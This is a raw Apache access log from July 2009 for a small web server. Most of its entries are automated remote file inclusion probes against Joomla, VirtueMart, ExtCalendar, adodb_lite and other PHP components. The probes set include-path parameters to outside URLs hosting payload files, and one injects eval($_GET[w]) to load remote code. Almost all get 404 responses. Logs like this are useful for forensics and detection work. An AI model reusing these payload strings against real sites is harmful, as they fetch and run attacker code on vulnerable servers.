58.27.156.10 - - [01/Jul/2009:00:44:22 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Seekmo 10.3.85.0)"
195.34.78.110 - - [01/Jul/2009:00:44:22 -0400] "GET /logs/access_log.Q109051400/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
80.93.50.112 - - [01/Jul/2009:00:44:32 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
80.93.50.112 - - [01/Jul/2009:00:44:32 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
80.93.50.112 - - [01/Jul/2009:00:44:32 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
38.99.13.118 - - [01/Jul/2009:00:46:33 -0400] "GET /logs/error_log.Q107103100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
195.34.78.110 - - [01/Jul/2009:00:47:19 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:47:27 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
124.0.145.1 - - [01/Jul/2009:00:48:00 -0400] "GET /logs/access_log.Q109061600//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
38.99.13.118 - - [01/Jul/2009:00:48:35 -0400] "GET /logs/access_log.Q108082000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
208.47.92.61 - - [01/Jul/2009:00:48:48 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
208.47.92.61 - - [01/Jul/2009:00:48:48 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
208.47.92.61 - - [01/Jul/2009:00:48:48 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
208.47.92.61 - - [01/Jul/2009:00:48:48 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
208.47.92.61 - - [01/Jul/2009:00:48:48 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
208.47.92.61 - - [01/Jul/2009:00:48:48 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
83.16.182.130 - - [01/Jul/2009:00:49:10 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.16.182.130 - - [01/Jul/2009:00:49:10 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
83.16.182.130 - - [01/Jul/2009:00:49:10 -0400] "GET /logs/access_log.Q109061300%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:00:49:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.16.182.130 - - [01/Jul/2009:00:49:16 -0400] "GET /logs/access_log.Q109052900%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
38.99.13.118 - - [01/Jul/2009:00:50:36 -0400] "GET /logs/error_log.Q107091300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
208.47.92.61 - - [01/Jul/2009:00:51:27 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
208.47.92.61 - - [01/Jul/2009:00:52:17 -0400] "GET /logs/access_log.Q109060500/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
208.47.92.61 - - [01/Jul/2009:00:52:44 -0400] "GET /logs/access_log.Q109060500%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
208.47.92.61 - - [01/Jul/2009:00:53:17 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
208.47.92.61 - - [01/Jul/2009:00:54:08 -0400] "GET /logs/access_log.Q109060500%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:00:54:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.204 - - [01/Jul/2009:00:54:14 -0400] "GET /logs/error_log.Q107122600 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.203.180.144 - - [01/Jul/2009:00:55:16 -0400] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
211.203.180.144 - - [01/Jul/2009:00:55:16 -0400] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
211.203.180.144 - - [01/Jul/2009:00:55:16 -0400] "GET /logs/access_log.Q109052900/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
211.203.180.144 - - [01/Jul/2009:00:55:19 -0400] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
211.203.180.144 - - [01/Jul/2009:00:55:19 -0400] "GET /logs/access_log.Q109052900/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
211.203.180.144 - - [01/Jul/2009:00:55:19 -0400] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
211.203.180.144 - - [01/Jul/2009:00:55:19 -0400] "GET /logs/access_log.Q109060100/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
211.203.180.144 - - [01/Jul/2009:00:55:20 -0400] "GET /logs/access_log.Q109060100/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:00:59:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.207.160.102 - - [01/Jul/2009:05:12:10 -0400] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.239.9.2 - - [01/Jul/2009:05:12:10 -0400] "GET /logs/error_log.Q109062300//administrator/components/com_moofaq/css/errors.php?error=http://band.lizetteand.com/media/deid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
211.233.11.27 - - [01/Jul/2009:05:12:11 -0400] "GET //components/com_flyspray/startdown.php?file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
87.239.9.2 - - [01/Jul/2009:05:12:10 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_moofaq/css/errors.php?error=http://band.lizetteand.com/media/deid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
87.239.9.2 - - [01/Jul/2009:05:12:10 -0400] "GET /logs//administrator/components/com_moofaq/css/errors.php?error=http://band.lizetteand.com/media/deid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
62.77.32.217 - - [01/Jul/2009:05:12:10 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.165.73.157 - - [01/Jul/2009:05:12:10 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
195.207.160.102 - - [01/Jul/2009:05:12:10 -0400] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
141.223.5.13 - - [01/Jul/2009:05:12:10 -0400] "GET /logs/access_log.Q109051700/?sourcedir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:05:12:10 -0400] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:05:12:10 -0400] "GET /logs/access_log.Q109060100%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.239.9.2 - - [01/Jul/2009:05:12:10 -0400] "GET //administrator/components/com_moofaq/css/errors.php?error=http://band.lizetteand.com/media/deid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
211.233.11.27 - - [01/Jul/2009:05:12:11 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
141.223.5.13 - - [01/Jul/2009:05:12:10 -0400] "GET /logs/access_log.Q109052200/?sourcedir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.165.73.157 - - [01/Jul/2009:05:12:10 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
195.207.160.102 - - [01/Jul/2009:05:12:11 -0400] "GET /logs/access_log.Q109060100%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.165.73.157 - - [01/Jul/2009:05:12:10 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
62.77.32.217 - - [01/Jul/2009:05:12:10 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:05:12:11 -0400] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.233.11.27 - - [01/Jul/2009:05:12:11 -0400] "GET /logs/access_log.Q109051100//components/com_flyspray/startdown.php?file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
121.165.73.157 - - [01/Jul/2009:05:12:10 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
141.223.5.13 - - [01/Jul/2009:05:12:10 -0400] "GET /?sourcedir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
62.77.32.217 - - [01/Jul/2009:05:12:10 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
141.223.5.13 - - [01/Jul/2009:05:12:10 -0400] "GET /logs/?sourcedir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 200 7716 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:05:12:21 -0400] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:05:12:21 -0400] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:05:12:21 -0400] "GET /logs/access_log.Q109060900%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.233.11.27 - - [01/Jul/2009:05:12:42 -0400] "GET /logs/access_log.Q109061800//components/com_flyspray/startdown.php?file=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
62.77.32.217 - - [01/Jul/2009:05:12:48 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
121.165.73.157 - - [01/Jul/2009:05:13:25 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
121.165.73.157 - - [01/Jul/2009:05:13:25 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
121.165.73.157 - - [01/Jul/2009:05:13:25 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
121.165.73.157 - - [01/Jul/2009:05:13:42 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
67.205.41.147 - - [01/Jul/2009:05:14:00 -0400] "GET /logs/access_log.Q109053100//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
67.205.41.147 - - [01/Jul/2009:05:14:00 -0400] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
67.205.41.147 - - [01/Jul/2009:05:14:00 -0400] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:05:14:45 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:05:14:45 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:05:14:45 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:05:14:45 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:05:14:45 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:05:14:45 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
141.223.5.13 - - [01/Jul/2009:05:14:52 -0400] "GET /logs/access_log.Q109052200%20%20/?sourcedir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
141.223.5.13 - - [01/Jul/2009:05:14:52 -0400] "GET /logs/access_log.Q109052200%20%20/?sourcedir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
141.223.5.13 - - [01/Jul/2009:05:14:52 -0400] "GET /?sourcedir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
141.223.5.13 - - [01/Jul/2009:05:14:51 -0400] "GET /?sourcedir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
141.223.5.13 - - [01/Jul/2009:05:14:52 -0400] "GET /logs/?sourcedir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 200 7716 "-" "Mozilla/5.0"
141.223.5.13 - - [01/Jul/2009:05:14:52 -0400] "GET /logs/?sourcedir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 200 7716 "-" "Mozilla/5.0"
211.233.11.27 - - [01/Jul/2009:05:14:57 -0400] "GET //administrator/components/com_moofaq/css/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
114.200.199.144 - - [01/Jul/2009:05:15:13 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:05:15:18 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.205.41.147 - - [01/Jul/2009:05:15:26 -0400] "GET /logs/access_log.Q109053100%20%20//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
203.151.217.29 - - [01/Jul/2009:05:16:14 -0400] "GET /logs/access_log.Q109051100/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
203.151.217.29 - - [01/Jul/2009:05:16:27 -0400] "GET /logs/access_log.Q109052800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
141.223.5.13 - - [01/Jul/2009:05:16:29 -0400] "GET /logs/access_log.Q109051700%20%20/?sourcedir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
141.223.5.13 - - [01/Jul/2009:05:16:32 -0400] "GET /logs/access_log.Q109051700%20%20/?sourcedir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:05:17:05 -0400] "GET /logs/access_log.Q109051300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:05:17:12 -0400] "GET /logs/access_log.Q109051300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:05:17:16 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:05:17:24 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:17:38 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:17:38 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:17:38 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:18:00 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:18:00 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:18:00 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:18:02 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:18:02 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:18:02 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:05:18:04 -0400] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://mexxs.net/images/test.gif?? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
202.181.243.113 - - [01/Jul/2009:05:18:04 -0400] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://mexxs.net/images/test.gif?? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
218.232.105.116 - - [01/Jul/2009:05:18:09 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:18:09 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:18:09 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:05:18:22 -0400] "GET /logs/access_log.Q109060100//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:18:24 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:18:25 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:05:18:28 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:05:18:39 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
